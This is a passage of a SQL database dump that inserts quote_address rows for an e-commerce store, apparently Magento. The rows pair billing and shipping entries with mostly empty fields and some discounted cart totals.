(1431, 899, '2026-04-04 16:05:49', '2026-04-04 16:05:49', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1432, 899, '2026-04-04 16:05:49', '2026-04-04 16:05:49', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1433, 900, '2026-04-04 16:05:50', '2026-04-04 16:05:50', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1434, 900, '2026-04-04 16:05:50', '2026-04-04 16:05:50', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1435, 901, '2026-04-04 16:05:51', '2026-04-04 16:05:51', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0);
INSERT INTO `quote_address` (`address_id`, `quote_id`, `created_at`, `updated_at`, `customer_id`, `save_in_address_book`, `customer_address_id`, `address_type`, `email`, `prefix`, `firstname`, `middlename`, `lastname`, `suffix`, `company`, `street`, `city`, `region`, `region_id`, `postcode`, `country_id`, `telephone`, `fax`, `same_as_billing`, `collect_shipping_rates`, `shipping_method`, `shipping_description`, `weight`, `subtotal`, `base_subtotal`, `subtotal_with_discount`, `base_subtotal_with_discount`, `tax_amount`, `base_tax_amount`, `shipping_amount`, `base_shipping_amount`, `shipping_tax_amount`, `base_shipping_tax_amount`, `discount_amount`, `base_discount_amount`, `grand_total`, `base_grand_total`, `customer_notes`, `applied_taxes`, `discount_description`, `shipping_discount_amount`, `base_shipping_discount_amount`, `subtotal_incl_tax`, `base_subtotal_total_incl_tax`, `discount_tax_compensation_amount`, `base_discount_tax_compensation_amount`, `shipping_discount_tax_compensation_amount`, `base_shipping_discount_tax_compensation_amnt`, `shipping_incl_tax`, `base_shipping_incl_tax`, `vat_id`, `vat_is_valid`, `vat_request_id`, `vat_request_date`, `vat_request_success`, `validated_country_code`, `validated_vat_number`, `gift_message_id`, `free_shipping`) VALUES
(1436, 901, '2026-04-04 16:05:51', '2026-04-04 16:05:51', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1437, 902, '2026-04-04 16:05:52', '2026-04-04 16:05:52', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1438, 902, '2026-04-04 16:05:52', '2026-04-04 16:05:52', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1439, 903, '2026-04-04 16:05:53', '2026-04-04 16:05:53', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1440, 903, '2026-04-04 16:05:53', '2026-04-04 16:05:53', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1441, 904, '2026-04-04 16:05:54', '2026-04-04 16:05:54', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1442, 904, '2026-04-04 16:05:54', '2026-04-04 16:05:54', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1443, 905, '2026-04-04 16:05:55', '2026-04-04 16:05:55', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1444, 905, '2026-04-04 16:05:55', '2026-04-04 16:05:55', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1445, 906, '2026-04-04 16:05:57', '2026-04-04 16:05:57', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1446, 906, '2026-04-04 16:05:57', '2026-04-04 16:05:57', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1447, 907, '2026-04-04 16:06:06', '2026-04-04 16:06:06', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1448, 907, '2026-04-04 16:06:06', '2026-04-04 16:06:06', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 321.0000, 321.0000, 256.8000, 256.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -64.2000, -64.2000, 256.8000, 256.8000, NULL, '[]', NULL, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1449, 908, '2026-04-04 16:06:11', '2026-04-04 16:06:11', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1450, 908, '2026-04-04 16:06:11', '2026-04-04 16:06:11', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 321.0000, 321.0000, 256.8000, 256.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -64.2000, -64.2000, 256.8000, 256.8000, NULL, '[]', NULL, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1451, 909, '2026-04-04 16:06:15', '2026-04-04 16:06:15', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1452, 909, '2026-04-04 16:06:15', '2026-04-04 16:06:15', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 321.0000, 321.0000, 256.8000, 256.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -64.2000, -64.2000, 256.8000, 256.8000, NULL, '[]', NULL, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1453, 910, '2026-04-04 16:06:20', '2026-04-04 16:06:20', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1454, 910, '2026-04-04 16:06:20', '2026-04-04 16:06:20', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 321.0000, 321.0000, 256.8000, 256.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -64.2000, -64.2000, 256.8000, 256.8000, NULL, '[]', NULL, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1455, 911, '2026-04-04 16:06:25', '2026-04-04 16:06:25', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1456, 911, '2026-04-04 16:06:25', '2026-04-04 16:06:25', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 321.0000, 321.0000, 256.8000, 256.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -64.2000, -64.2000, 256.8000, 256.8000, NULL, '[]', NULL, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1457, 912, '2026-04-04 20:51:23', '2026-04-04 20:51:23', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1458, 912, '2026-04-04 20:51:23', '2026-04-04 20:51:23', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1459, 913, '2026-04-04 21:28:21', '2026-04-04 21:28:21', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1460, 913, '2026-04-04 21:28:21', '2026-04-04 21:28:21', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1461, 914, '2026-04-05 02:04:35', '2026-04-05 02:04:35', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1462, 914, '2026-04-05 02:04:35', '2026-04-05 02:04:56', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 12.0000, 5064.0000, 5064.0000, 4051.2000, 4051.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -1012.8000, -1012.8000, 4051.2000, 4051.2000, NULL, '[]', NULL, 0.0000, 0.0000, 5064.0000, 5064.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1463, 915, '2026-04-05 03:34:34', '2026-04-05 03:34:34', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1464, 915, '2026-04-05 03:34:34', '2026-04-05 03:34:34', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1465, 916, '2026-04-05 04:20:21', '2026-04-05 04:20:21', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1466, 916, '2026-04-05 04:20:21', '2026-04-05 04:20:21', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1467, 917, '2026-04-05 09:41:21', '2026-04-05 09:41:21', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1468, 917, '2026-04-05 09:41:21', '2026-04-05 09:41:21', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1469, 918, '2026-04-05 11:41:14', '2026-04-05 11:41:14', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1470, 918, '2026-04-05 11:41:14', '2026-04-05 11:41:14', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1471, 919, '2026-04-05 16:19:35', '2026-04-05 16:19:35', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1472, 919, '2026-04-05 16:19:35', '2026-04-05 16:19:35', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1473, 920, '2026-04-05 19:08:52', '2026-04-05 19:08:52', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1474, 920, '2026-04-05 19:08:52', '2026-04-05 19:08:52', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
